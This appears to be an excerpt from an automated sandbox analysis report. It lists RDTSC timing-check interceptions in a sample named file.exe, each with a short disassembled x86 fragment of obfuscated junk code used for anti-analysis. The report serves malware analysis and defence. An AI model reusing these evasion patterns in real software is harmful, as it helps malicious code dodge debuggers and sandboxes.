                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A56C second address: D3A5F6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F0C44DA3FECh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0C44DA3FE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D5570h], ecx 0x00000032 movsx edi, cx 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+12454724h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F0C44DA3FE8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 or dword ptr [ebp+122D1ED9h], esi 0x0000005f xchg eax, esi 0x00000060 ja 00007F0C44DA3FEEh 0x00000066 push eax 0x00000067 jns 00007F0C44DA3FF0h 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D71B second address: D3D71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D71F second address: D3D725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E883 second address: D3E8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F0C44EBA8E8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+12481329h], esi 0x00000027 stc 0x00000028 push 00000000h 0x0000002a clc 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e clc 0x0000002f mov al, F0h 0x00000031 popad 0x00000032 jmp 00007F0C44EBA8F6h 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e popad 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6D7 second address: D3F6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E9DC second address: D3E9E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44EBA8ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6DB second address: D3F756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jno 00007F0C44DA3FEEh 0x0000000e nop 0x0000000f mov bl, 79h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0C44DA3FE8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D197Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F0C44DA3FE8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f sbb edi, 52B9FFFCh 0x00000055 push ebx 0x00000056 add dword ptr [ebp+122D31F7h], edx 0x0000005c pop edi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 jo 00007F0C44DA3FE6h 0x00000067 pop edi 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E9E6 second address: D3EA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F0C44EBA8E8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+124548CBh], edi 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0C44EBA8E8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a add dword ptr [ebp+124548EFh], eax 0x00000050 xor ebx, 7CFDB097h 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov edi, 2213F2D0h 0x00000062 mov eax, dword ptr [ebp+122D0A19h] 0x00000068 push esi 0x00000069 xor bh, FFFFFFB2h 0x0000006c pop ebx 0x0000006d push FFFFFFFFh 0x0000006f mov dword ptr [ebp+122D2B25h], eax 0x00000075 push eax 0x00000076 pushad 0x00000077 jns 00007F0C44EBA8FFh 0x0000007d jmp 00007F0C44EBA8F9h 0x00000082 push eax 0x00000083 push edx 0x00000084 push edi 0x00000085 pop edi 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F756 second address: D3F75B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40587 second address: D405CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+12480A46h], esi 0x0000000d push 00000000h 0x0000000f call 00007F0C44EBA8EFh 0x00000014 add ebx, 11AD26F5h 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d xor edi, dword ptr [ebp+122D371Ah] 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 jmp 00007F0C44EBA8F0h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D405CA second address: D405CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F899 second address: D3F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F89D second address: D3F8CB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44DA3FFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F0C44DA3FF4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8CB second address: D3F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D419BE second address: D419C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2A51 second address: CE2A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48ED7 second address: D48F1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0C44DA3FF6h 0x0000000a jmp 00007F0C44DA3FF5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0C44DA3FECh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F1D second address: D48F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F21 second address: D48F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D490A7 second address: D490E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0C44EBA8F6h 0x00000008 jmp 00007F0C44EBA8EFh 0x0000000d pop esi 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0C44EBA8EFh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AEC4 second address: D4AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AEC8 second address: D4AECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AECE second address: D4AF19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44DA3FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44DA3FF1h 0x00000012 jmp 00007F0C44DA3FF7h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AF19 second address: D4AF4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F0C44EBA8F2h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0C44EBA8E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF3B3 second address: CDF3D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF5h 0x00000007 jmp 00007F0C44DA3FEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EEFF second address: D4EF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8EBh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F87C second address: D4F887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0C44DA3FE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F887 second address: D4F88E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55741 second address: D5575F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F0C44DA400Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5575F second address: D55763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55763 second address: D5577D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55FCE second address: D55FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5627B second address: D5628A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56512 second address: D56517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63871 second address: D6387B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D626E1 second address: D626EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6292A second address: D62930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D62930 second address: D6296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0C44EBA904h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F0C44EBA8E6h 0x00000017 jno 00007F0C44EBA8E6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6296B second address: D62977 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D62977 second address: D629A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D631A8 second address: D631B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44DA3FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D631B7 second address: D631BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D631BC second address: D631C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D631C4 second address: D631C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D680DF second address: D680E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D683B6 second address: D683C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D683C0 second address: D68400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0C44DA3FF8h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0C44DA3FECh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68400 second address: D6841D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68843 second address: D68849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68AC7 second address: D68ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68ACD second address: D68AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68AD2 second address: D68ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68ADB second address: D68AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F0C44DA3FE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68AE9 second address: D68AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C2C second address: D68C58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0C44DA3FF1h 0x00000008 pop esi 0x00000009 jmp 00007F0C44DA3FF0h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C58 second address: D68C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C5C second address: D68C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C62 second address: D68C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C6C second address: D68C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C70 second address: D68C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68C74 second address: D68C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jp 00007F0C44DA3FE6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E01 second address: D68E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0C44EBA8ECh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E1B second address: D68E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0C44DA3FF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E50 second address: D68E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E55 second address: D68E71 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44DA3FECh 0x00000008 jl 00007F0C44DA3FE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F0C44DA3FE6h 0x00000016 ja 00007F0C44DA3FE6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68FD0 second address: D68FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68FD7 second address: D68FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA3F3 second address: CDA408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44EBA8EDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA408 second address: CDA412 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44DA3FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA412 second address: CDA418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA418 second address: CDA437 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44DA3FE8h 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44DA3FEDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA437 second address: CDA43C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA43C second address: CDA44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F0C44DA3FE6h 0x0000000d jne 00007F0C44DA3FE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D0E8 second address: D6D11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 je 00007F0C44EBA8E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0C44EBA8F3h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D11B second address: D6D12B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D12B second address: D6D134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D134 second address: D6D144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FEAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D144 second address: D6D15D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D15D second address: D6D161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D161 second address: D6D165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24958 second address: D08E1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44DA3FF3h 0x00000008 jmp 00007F0C44DA3FEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0C44DA3FE8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12457114h], ecx 0x00000030 sub dword ptr [ebp+122D17F4h], esi 0x00000036 call dword ptr [ebp+122D1C86h] 0x0000003c jne 00007F0C44DA4015h 0x00000042 push ebx 0x00000043 jmp 00007F0C44DA3FECh 0x00000048 je 00007F0C44DA3FF2h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24AB0 second address: D24AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F0C44EBA8E6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24EF1 second address: D24EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24EF5 second address: D24EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
